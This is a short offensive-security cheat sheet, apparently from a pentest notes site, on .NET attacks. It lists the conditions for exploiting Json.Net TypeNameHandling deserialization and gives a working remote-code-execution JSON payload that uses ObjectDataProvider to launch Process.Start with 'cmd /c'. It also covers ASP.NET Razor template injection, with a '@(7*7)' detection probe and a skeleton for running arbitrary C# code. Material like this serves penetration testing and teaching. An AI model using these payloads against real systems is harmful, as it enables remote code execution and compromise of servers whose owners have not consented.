.NET

Json.Net Deserialization

Requires a custom TypeNameHandling setting by the dev (not insecure by default!). On of the following must be true for type that is deserialized:

It is Object Type (java.lang.Object or System.Object)
It is a non-generic collection (e.g.: ArrayList, Hashtable, etc.)
It implements IDynamicMetaObjectProvider
It is System.Data.EntityKeyMember or any derived Type from it. We may not need even
TypeNameHandling property set to a non-None (see the EntityKeyMemberConverter in
"TypeConverters" ).

Common RCE payload (can also be created with ysoerial.net):

{
    '$type':'System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35',
    'MethodName':'Start',
    'MethodParameters':{
        '$type':'System.Collections.ArrayList, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089',
        '$values':['cmd','/c <payload>']
    },
    'ObjectInstance':{'$type':'System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089'}
}

ASP.NET Razor Template Injection (SSTI)

Check if vulnerable:

@(7*7)

Exploit:

@{
  // C# code
}

References

https://clement.notin.org/blog/2020/04/15/Server-Side-Template-Injection-(SSTI)-in-ASP.NET-Razor/

PreviousESI NextBurp

Last updated 1 year ago